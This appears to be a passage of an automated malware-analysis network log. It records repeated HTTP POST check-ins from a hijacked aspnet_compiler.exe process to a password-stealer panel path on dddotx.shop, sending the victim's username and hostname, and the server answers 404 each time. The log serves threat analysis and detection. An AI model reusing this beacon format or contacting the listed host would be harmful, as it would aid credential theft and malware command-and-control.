                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:13.993422985 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:14.665118933 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cQ51Gmp0eDgLj7ztwEM3HDSYqW5yek9MwLJS70Oev2qyMeHSK81%2Fo68FvqiaEHd6xkza1pnG%2B6%2F4hNruuSII5ZukMevtzLW4pk4tfPyk%2BSwmhOLGGtcvyv9Gk5NVAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e1ffbd6c443-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  104192.168.2.455980188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:14.834512949 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:14.842546940 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:15.525509119 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g34fbR2gKMzgdlcFVB4ONhC4jVCb79W9gEKBhireFB%2FvgYCOno7mxvPguLY40M5EzTuQQYsBfHVFIR6ms8eNEbhmVnKj2PIJ3iP%2B2ojO1O5YgfN9Ctk12DY1SEcTIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e254d7542fc-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  105192.168.2.455981188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:15.686281919 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:15.691270113 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:16.351320982 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oku57ku%2ByhJ4L4Zy2FXfxr0sbjlHCxj0gmtVxqb4yHalViOhEE0Vv9UfFE%2FDmgkMagKtL6%2BIVqFNVcMDD6H1%2FWSovzXyOVJcilbXgspbTRT6hbZoAIrT0XSJei7FHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e2a89394396-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  106192.168.2.455982188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:16.545212030 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:16.551798105 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:17.329895020 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O5BC95%2FKCnA29OJK8ckki9PlYQ2A2Q6eVH3bHNTfaqUZPqyi7nf6a9TYlcg%2FDSS%2B2BdQMB5oGYV9ALGSJR1O0h%2BLajNhJyW4HrKzPM%2B8l6vqUgsUKhpZFkrib30E5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e2ff84872a1-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  107192.168.2.455983188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:17.492960930 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:17.497859955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:18.191195965 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7RreTgmB4WA%2FmyEd44IMkIL7CV25qUh59a7dPeDaZh8T%2Fl6Oeil8k03ANkZCzPykUZAC4SzsK6WEpONZXC5xpHOdShTdO73zmVd1J9VQTtWN1I5w24ZGWVCCNtbEuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e35ded941fb-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  108192.168.2.455984188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:18.358325958 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:18.363198042 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:19.039804935 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTHGSZSAC5ZMaC%2FlEVWQj4QqZjh8h%2FoxLIxIjVxPM1uhMvmcxXs%2FryvjtXTbYlItwxrm9%2BdXLiVG%2FLlLfoeLDhqlTFeJXVDa1ZQeBv%2BmVxT250H1Ch6YQ0ryAScoCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e3b3b098c0c-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  109192.168.2.455985188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:19.194960117 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:19.199856043 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:19.925561905 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1u8IGhvgWyjhBseK%2FwiAxUHc2VKiV4Behkp1PlnWUhsX2%2Bq%2F1%2F7YU4gFPksSLrjtfrKhCkWOz34r0BZ0vSlxKMHuCc7sbB5QG%2Bgs%2FYldrYZJOkR2EURU1c7qpQjZgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e407c450f89-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  110192.168.2.455986188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:20.089766979 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:20.095707893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:21.354742050 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i3ClZajjkQSsMULnANdt8VOnMPk0SfIuJfrt6wKTh3RnhxS950dIB%2FFZMSSWTTw442HMevCgLFQ0BOAerKe9aLhz58wBbl57rweZN1R45k9s%2B6xTKVxcqXLS%2FJltwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e461b2819ff-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
                  Sep 25, 2024 15:30:21.354896069 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i3ClZajjkQSsMULnANdt8VOnMPk0SfIuJfrt6wKTh3RnhxS950dIB%2FFZMSSWTTw442HMevCgLFQ0BOAerKe9aLhz58wBbl57rweZN1R45k9s%2B6xTKVxcqXLS%2FJltwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e461b2819ff-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  111192.168.2.455987188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:21.502037048 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:21.507010937 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:22.975692987 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnoBuli1KhNTBCVJXad04WA57t6rBO3BmdRs7XnwClcoUXs764U%2FOy61Ak3%2FMgXX5zDQD67S0IdYQtiOX2GDfJt4htpoPPEeLN%2FbM%2BKjBTD1hrNjljRWa2gY%2BU%2FroA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e4eea8a4304-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
                  Sep 25, 2024 15:30:22.977467060 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnoBuli1KhNTBCVJXad04WA57t6rBO3BmdRs7XnwClcoUXs764U%2FOy61Ak3%2FMgXX5zDQD67S0IdYQtiOX2GDfJt4htpoPPEeLN%2FbM%2BKjBTD1hrNjljRWa2gY%2BU%2FroA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e4eea8a4304-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
                  Sep 25, 2024 15:30:22.977809906 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnoBuli1KhNTBCVJXad04WA57t6rBO3BmdRs7XnwClcoUXs764U%2FOy61Ak3%2FMgXX5zDQD67S0IdYQtiOX2GDfJt4htpoPPEeLN%2FbM%2BKjBTD1hrNjljRWa2gY%2BU%2FroA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e4eea8a4304-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  112192.168.2.455988188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:23.129600048 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:23.134473085 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:24.171243906 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lslfODFSnBd%2FBVhYRtxsPhy6K02pDv7T32TBi5q9T3LYDz%2BnQXDOwNoLI27wQwMf6JmPWmKUmBdqm%2BuYC8x1RSd720vmMsywQrrwxtg1t8JMeIqRtDVal7yw01jg%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e590fea0ccd-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.
                  Sep 25, 2024 15:30:24.173330069 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lslfODFSnBd%2FBVhYRtxsPhy6K02pDv7T32TBi5q9T3LYDz%2BnQXDOwNoLI27wQwMf6JmPWmKUmBdqm%2BuYC8x1RSd720vmMsywQrrwxtg1t8JMeIqRtDVal7yw01jg%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e590fea0ccd-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  113192.168.2.455989188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:24.345341921 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:24.350366116 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:25.134206057 CEST563INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dH38UhiplB%2BKC1guJFoTrPPqv9hzw5u2HlCLKSpCNPZZ4je7XsKE9TaAAP23QE5Qu6PAC1bQg7qmig7zTjtlow8z5P3WvGB8NJgPtcBQaqv1J5whiGsycSJBw2IZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e60cb8a8ce6-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  114192.168.2.455990188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:25.285468102 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:25.290427923 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:26.009540081 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IGqraZ39hxAzqnvc1fjL7B4Qf0Wwu%2FbUhlgEYgHY1R6psG0TnCIQTf829QaSd8GoB4jfDVFjlRTd0J5AFeQz19oXRNAwknIVKXVPERYWBcJ2c4qiyz%2FekbEjdyDr9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e66bf1a7d13-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  115192.168.2.455991188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:30:26.163558960 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:30:26.169979095 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:30:26.831254005 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:30:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FBwcTQcWI8shv%2BlA%2F0avvtZx3u2ONid8f7hG3sSZQEzgbYPWFyEXA%2FpKv2eQWHyP5o9AcAktLbekrQ0XzF%2B7kQj%2Fig9Kml8HSKQ9eJw2BEDloEDutOKWE0zM3lNEkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5e6c0a070cb2-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


